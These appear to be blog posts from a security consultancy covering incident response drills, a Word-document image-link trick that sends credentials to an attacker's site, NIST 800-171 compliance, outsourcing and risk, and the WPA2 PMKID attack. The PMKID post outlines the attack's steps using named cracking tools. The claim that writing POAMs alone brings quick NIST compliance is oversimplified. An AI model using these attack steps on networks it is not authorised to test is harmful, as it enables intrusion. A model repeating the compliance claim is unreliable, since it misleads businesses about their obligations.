Test Your Incidence Response Plans

So we all must have an Incidence response plan, which is only used after a computer security problem:

  1. Detect problem
  2. Investigate problem
  3. What type of the threat to the business?
  4. Does it rise to level of “Breach”? With significant legal disclosure requirements
  5. Did the attackers steal information/data?

 

We know practice makes perfect, but how do we practice responding to a known attack without actually getting a hacker and hacking your systems?

So of course getting a pentester and having your environment tested for problems is a good thing. But we need to also have a method of trying to get our IT staff to not be afraid to follow the crumbs to a potential breach. People tend to get better the more they do something, so a pentest would also be useful for IT staff incident reports.

 

With or without a pentest it is wise to create a “write-up”  report that acts as if the breach or hack happened so the IT personnel computers will be used to working through the “paperwork” process.

 

So let us do it together?

1. We detected a problem in the logs, they were zeroed out on our windows 2012 server.

2. we do not know why this happened, but the event logs now have a handful of events (going back to yesterday only).

3. Is this a threat to the business? If there are no logs to see how will we  know what happened in the last few days before the logs were deleted?

4. Review systems, to see if any new files have been added, you will have to make comparisons to recent backups.  Also review any customer data if it resides on the server (is customer data valid?).  If you have no way of doing this today, better start working on a process now.

5. The last point is where the most difficult assessment has to be performed. Is this a threat to the business? was data stolen?

And this is exactly where many companies get tripped up. Every day you are running your business and it seems like any other day. Losing event logs does not mean much… but it could be a sign of a serious breach.

Find out if your files have been altered. the problem is that some malware is only here for other purposes, so some files being altered have lower risk and impact. How can we know if there is a high impact high risk alteration?

To have any chance of knowing a breach happened means that you need IT Personnel to do the following:

  • Vigilant employees
  • Notice  unauthorized logins
  • See unauthorized usage of computer systems
  • Reboots are mysteriously happening on the own, why?
  • review administrative account access on actions that are unknown to administrators.
  • Notice unusual outbound traffic
  • Are files being added to your computer systems without IT department knowledge?
  • Logs are being deleted or very few event logs available on critical systems
  • Was data stolen?

 

A lot of these bullet points assume you can see potential breach indicators, so here is an Infographic to help you with this process.

 

If you are not testing your incident response plans, what will happen when a real attack happens?

Contact us to help you with Oversite or auditing needs.

 

How are Hackers Always a Step Ahead of Defense?

So the Defense (also known as Blue team) has been inundated with spam, the goal of the spam(for the hackers) is for an unsuspecting user to give up their credentials(username and password). Hackers are always trying to get your usernames and passwords.

Opening a word document? What if it included a small file that is unlikely  or even impossible to detect when first opening the file? because it gets resized to a small point in the document.

Notice the above image shows how to create a link inside a picture.

the above image is from ISC.sans.edu link.

So due to various dirty tricks in spam we have built 2FA (Two Factor Authentication) so that the connecting to the email server and getting your email will effectively shut out the spam merchants… until now with this nifty trick.  (Do you have to re-establish 2FA every time you get email? Or only when first logging in?)

When you open the word document the picture activates and tries to connect to the criminal-hacker-website.com which then sends the credentials of the computer to criminal-hacker-website.com.

Clearly only username and password defense is not going to do the job, as many tricks will pry the information to your account out of you.  And an incorrectly set up 2FA also would be a problem.

The defense must have a good logging and egress filter setup. (Block port 445/tcp , 137/tcp, 139/tcp, and 137/udp and 139/udp.

Back to my question “How are Hackers Always a step ahead of the Defense?”

The answer lies in logic actually:  If you have to defend 24 hours per day every day while trying to use software of the Internet then it is only a matter of time before a hacker uses ingenuity to break or bypass your defenses as shown above. We have to constantly be aware of new attacks and thus ways of defending against new vulnerabilities found every day.

True it would be nice if all software did not have security issues, but as we know security is not the highest effort while making a product. Making money is, and sometimes a security audit is not high on the priority scale.

So it is the same old story “The risk versus Security” see-saw.

The people who focus on Security might spend more in resources rather than others, so if you hear a new potential attack are you impulsively scoffing? Or saying I have to learn this attack and defend against it (thus spending resources?

if you are scoffing and wish to take on more risk by thinking the security problems might go away just by thinking they will go away. The risk on the internet these days is not that low, the ingenuity of new attacks are coming so fast that if you have not upped your ante, then one day it will be too late and the headlines will serve your epitaph.

So We believe that you should do both seek some risks while also staying secure  by employing Security Auditors.

 

Contact Us to discuss

NIST 800-171 Compliance Can be Done Quickly!

NIST 800-171 Compliance actually means DFARS Cybersecurity requirements must be met.

The NIST 800-171  requirements have always vexed small manufacturers due to the specific wordiness, so the NIST (National Institute of Standards and Technology) has been trying to make this easier to understand with the following pdf: https://nvlpubs.nist.gov/nistpubs/hb/2017/NIST.HB.162.pdf

This is an important paragraph: from pdf

Executive Order 13556, Controlled Unclassified Information, November 4, 2010, establishes that the Controlled Unclassified Information (CUI) executive Agent, designated as the National Archives and Records Administration (NARA), shall develop and issue such directives as are
necessary to implement the CUI Program. Consistent with this tasking and with the CUI Program’s mission to establish uniform policies and practices across the federal government, NARA issued a final federal regulation in 2016 that established the required controls and markings for CUI government-wide. This federal regulation binds agencies throughout the
executive branch to uniformly apply the standard safeguards, markings, dissemination, and decontrol requirements established by the CUI Program.

 

So needless to say if you are a small manufacturer  and sell stuff to the US government you will have to be compliant  or else…. what is the or else?  I surmise the or else is pretty bad, since there has been plenty of time for you to get on board of this new initiative . Admittedly it has been a chore to get through the NIST 800-171  documents up to now.  As I have discussed in June on this site.

Like this for example:

There are many such points in the document,

Here is the full list of 14 points you have to work on:

14 controls have to be set up

  1. AC  – Access Control
  2. AT – Awareness & Training
  3. AU – Audit & accountability
  4. CM – Configuration Management
  5. IA – Identification and Authentication
  6. IR – Incident Response
  7. MA – Maintenance
  8. MP – Media Protection
  9. PS – Personnnel Security
  10. PP – Physical Security
  11. RA – Risk Assessments
  12. SA – Security Assessments
  13. SC – System & Communications protection
  14. SI – System & Information integrity

 

None of these points are actually brain surgery, where you need 10 plus years of training and schooling. In fact most of these your IT department can perform in their regular work. they just need support from above (i.e. resources).

The one point of audit and accountability the company itself cannot do it by itself effectively. As there is nothing like a person outside of the organization to have a point of view that can be fresh or at least without the company culture in mind.  which is what we do here at Fixvirus.com

So these 14 points should not dissuade you from becoming compliant, in fact even if you do not have multi-factor authentication(Identitification and Authentication), and it would take 6 months to implement, all you have to do is to create a POAM or  Plan of Action and Milestone.   So once you have writtenup proof or POAMs then you are compliant – easy.

This is how I can state that you can come into “compliance” with NIST 800-171 quickly.

Contact us to review and discuss .

Does Outsourcing Make You More Secure?

Outsourcing is good, since we cannot specialize in everything we can focus on sales or inventory instead of mundane tasks. So what is important and what is mundane? That depends on your business…  most businesses are not a software company, so obtaining software needs by outsourcing may be smart.  Then the question is should you buy software or just rent the software on a server(“the cloud”) on the Internet?

The answers to what is important depends on your business. Obviously if you are a restaurant, it is food. But what if it is not as obvious?  How about if you are selling services online and offline(with sales people)?

Every business has customers or patients, (whatever the industry term is). And every business has to get paid somehow. So the payment information and customer database has to be secured in all businesses(or for that matter non-profits as well).

Customers are important to the business since they keep the business afloat. Thus everything to do with our customers is important to us and our competitors. Of course employee data is also important to keep secure.

This methodology is the same line of thinking when you set up a risk management analysis.

Depending on the business some important information electronically may be how one creates a product.

For all businesses the financial transactions, accounting and anything to do with money has to be safeguarded. Overarching needs of Identity Access Management(IAM) is important.

The major business sectors:

  1. Sales of items not unique(commodities) retail, wholesale, restaurants etc.
  2. Manufacturing, Mining, and Farming industries that obtain stuffs from the earth, and might have IP (intellectual property)
  3. Health industry – any business that takes care of patients
  4. Consultant industry – bills hourly rate with labor
  5. Computer  systems are used to create technology

All of these businesses have some things in common, even if not all of them may have IP (Intellectual Property), Customer database, Computer Equipment, Financial Information (accounting).

The commonality of the computer systems, accounting,customers, and employees makes all businesses think what exactly do we outsource?   the experts say outsource the functions that are not central to your main business model.  So everyone except for accountants could outsource the financial applications by using online Internet apps in the cloud(someone else runs the computer).  Notice, I do not say the reason to outsource is to be more secure.  Security on the Internet is not predicated on whether you outsource to the cloud.

To outsource has to do with business reasons not security.  The bottom line in the year 2018 and beyond Cybersecurity must be in everything no matter what.  The key is even though we expect it(Cybersecurity) we do not want to overpay.  So this is where the next stage of our analysis comes into play.

RISK MANAGEMENT – is a direct result of what is important to the business, what is outsourced, and how to allocate resources.

Every business is different, and must make the choices to weigh the needs of the business.  If you have IP then that could be more important than customers, since the customers will come back to you if you have the IP.

But if there is no IP, the most important functions might be a close tie between customers and financial (Credit Card or bank information). Everyone has Computers that connect to the Internet, here is where the true outsourcing idea can come to fruition.  So we still have to secure our personal devices to connect to the cloud.

Social Engineering and scams can always take over and steal your hard earned resources even if you have good security.  So the reality is outsourcing or “the cloud” does not matter.

Secure your devices!!  Keep up to speed with changing cybersecurity landscape such as in our Security News Analyzed page.

Contact us to make this happen by using security policies, risk management analysis and more.

 

New Wi-Fi attack found on WPA2 using PMKID

This could make many “thought safe” Wi-Fi routers not so

Here is where paying attention to new attacks is important.

hashcat.net has the information:

This attack does not even need a full EAPOL 4-way handshake,  EAPOL stands for Extensible Authentication Protocol(EAP) over LAN. A simple 4-way handshake is shown pictorially below  (from hitchhikersguidetolearning.com)

This means that in the past an attack on Wi-Fi would would need EAPOL  4-way handshake to be captured. Capturing the 4-way handshake is sometimes difficult to achieve.

Instead in this attack: ” We receive all the data we need in the first EAPOL frame from the AP.”

First one captures a sample initial Message from the ‘Authenticator’ which includes a PMKID (run hcxdumptool)

Second (run hcxpcaptool) to convert captured data from pcapng format to a hash format accepted by hashcat

Third (run hashcat) to crack the string of data.

 

So now no 4-way handshake is needed, only expertise to run a couple of scripts and to know how to set up the Wi-Fi capture by using the Wi-Fi network card.

The comments on the hashcat webpage do mention that your Wi-Fi network card must have the capability to capture wlan traffic.

So this requires more review and investigations.

Contact us to try it on your network.